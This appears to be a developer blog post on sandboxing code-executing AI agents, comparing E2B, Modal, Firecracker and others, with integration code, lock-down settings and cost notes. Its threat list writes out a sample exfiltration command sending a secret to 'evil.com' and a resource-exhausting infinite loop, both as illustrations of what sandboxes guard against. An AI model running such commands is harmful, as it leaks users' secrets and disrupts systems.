Code-executing AI agents are now standard. ChatGPT runs Python; Claude Code executes commands; analytical agents spin up Python kernels. Where they execute matters as much as what they execute. This post is the working guide to sandboxed code execution for agents in 2026.

Why sandboxes

Agents run code based on user input, retrieved documents, or LLM-generated reasoning. All three are untrusted. Without isolation:

  • Filesystem leakage/etc/passwd, AWS credentials, other users’ data.
  • Network exfiltrationcurl evil.com -d $secret.
  • Resource exhaustionwhile true; do :; done.
  • Privilege escalation — kernel exploits, container breakouts.

A sandbox is the answer. The question is which one.

The 2026 stack

TypeSpin-upStrengths
E2BManaged Firecracker<500msBuilt for AI agents, code-interpreter shape, GitHub auth
ModalManaged serverless1–2sGeneral compute, GPU support, big batches
DaytonaManaged dev envs2–5sIDE-shaped, good for dev tools
Fly MachinesManaged Firecracker200msGeneric, very cheap
AWS LambdaManaged<100msMature, restrictive (no GPU, 15min limit)
Cloudflare Workers / SandboxManaged isolates10msV8 only, very fast, limited
Daytona / CodespacesContainers3–10sPersistent dev experience
Self-host FirecrackerSelf-host200msFull control
gVisorSelf-host100msContainer-style sandbox

E2B — the AI-native choice

E2B is purpose-built for agents. Spin up a Linux VM in <500ms, run code, kill it.

from e2b_code_interpreter import Sandbox

with Sandbox() as sb:
    result = sb.run_code("import pandas as pd; df = pd.read_csv('data.csv'); df.describe()")
    print(result.text)

    # Upload a file
    sb.files.write("/tmp/script.py", "print('hi')")

    # Run a shell command
    out = sb.commands.run("ls -la /tmp")

What’s good:

  • Fast spin-up. Firecracker microVM under the hood.
  • Persistent state within a sandbox session.
  • File and command APIs — most agent needs.
  • Pre-installed Python, Node, etc. Agent doesn’t have to install pandas every time.
  • Internet access (allowlist configurable).

For a code interpreter for an LLM, E2B is the path of least resistance.

For larger workloads (longer runs, GPU, big batch jobs), Modal is the next step.

import modal

app = modal.App("agent-runner")

@app.function(image=modal.Image.debian_slim().pip_install("pandas", "scikit-learn"))
def analyze(csv_text: str) -> str:
    import pandas as pd
    from io import StringIO
    df = pd.read_csv(StringIO(csv_text))
    return df.describe().to_json()

# Call from agent:
result = analyze.remote(csv_data)

Modal scales bigger and supports GPUs. It’s not “spin-up-microVM-fast” — typical first call is 1–2s — but for longer jobs the difference is irrelevant.

Tool integration with an LLM

@tool
async def run_python(code: str) -> str:
    """Run Python code in a sandbox. Returns stdout + stderr."""
    async with E2BSandbox() as sb:
        try:
            result = await sb.run_code(code, timeout=30)
            return result.text or result.error or "(no output)"
        except Exception as e:
            return f"sandbox error: {e}"

Wire to an agent :

agent = create_agent(tools=[run_python])
result = await agent.ainvoke({"messages": [HumanMessage("calculate the variance of [1,2,3,4,5]")]})

The agent calls run_python with code; the sandbox executes; results flow back. Same shape as any tool call.

What to lock down

For each sandbox session, decide:

  • Network: full / allowlist / none. Default to allowlist (the few APIs the agent should reach).
  • Filesystem: scratch only / mount specific dirs / read-only.
  • Time limit: 30 seconds is generous for most code; cap aggressively.
  • Memory limit: 1 GB for code interpreters; less for narrow tasks.
  • CPU limit: 1 core usually plenty.
  • Egress data: cap bytes; alert on outliers.

E2B and Modal both expose these. Self-host and you set them yourself.

When self-hosted wins

  • Strict compliance (data must not leave VPC).
  • High volume (>100 sandboxes/min sustained — managed cost rises).
  • Specific networking needs (custom egress filtering).
  • Custom base images that aren’t a fit for managed.

For most teams under that threshold, managed (E2B / Modal) wins.

Common patterns

1. Per-conversation sandbox

The agent maintains one sandbox per user session. State persists across tool calls within the session. Killed at session end.

2. Per-call sandbox

Stateless: each run_python spins up fresh. Simple, slower, sometimes wasteful (re-imports pandas every call).

3. Pool of warm sandboxes

For low-latency apps, keep N sandboxes warm. New requests grab from the pool. Slightly more ops; sub-100ms response.

4. Sandboxed agents (recursive)

The whole agent runs in a sandbox. Useful when the agent itself is untrusted (running user-uploaded prompts).

Cost reality

E2B: ~$0.0002/second of sandbox time. A typical query (5 seconds) costs $0.001. At 100k queries/day: $100/day, $3k/month.

Self-hosted Firecracker on cheap VMs: ~$0.00001/sec. Same query = $0.00005. At scale, self-host is dramatically cheaper. Below scale, the ops cost eats the savings.

Common mistakes

1. No timeout

Agent’s bug → infinite loop → sandbox bills accumulate. Always cap.

2. Network wide-open

The agent emits curl, exfils data. Always allowlist.

3. State across users

Reusing a sandbox between users → previous user’s secrets in env vars/filesystem. Always fresh per user.

4. Logging code without redaction

The user might paste an API key into a code block. Logged code = leaked key. Filter or hash before logging.

5. No resource caps

A misbehaving agent can OOM the sandbox host. Caps protect everyone.

What I’d build today

For a new agent product that runs code:

  • E2B for the sandbox (managed, fast, agent-shaped).
  • A run_python and run_shell tool wired to the agent.
  • Sandbox per user session, killed on disconnect.
  • 30-second timeout, 1 GB memory cap by default.
  • Network allowlist for the APIs the agent should reach.
  • Logging + alerting on long runs and failed sandboxes.

Pair with the LLM Security in 2026 defenses — sandbox is one layer in a defense-in-depth strategy.

Read this next

If you want a working agent + E2B + tool-call template, it’s at rajpoot.dev .


Building something AI-, backend-, or data-heavy and want a second pair of eyes? I do consulting and freelance work — see my projects and ways to reach me at rajpoot.dev .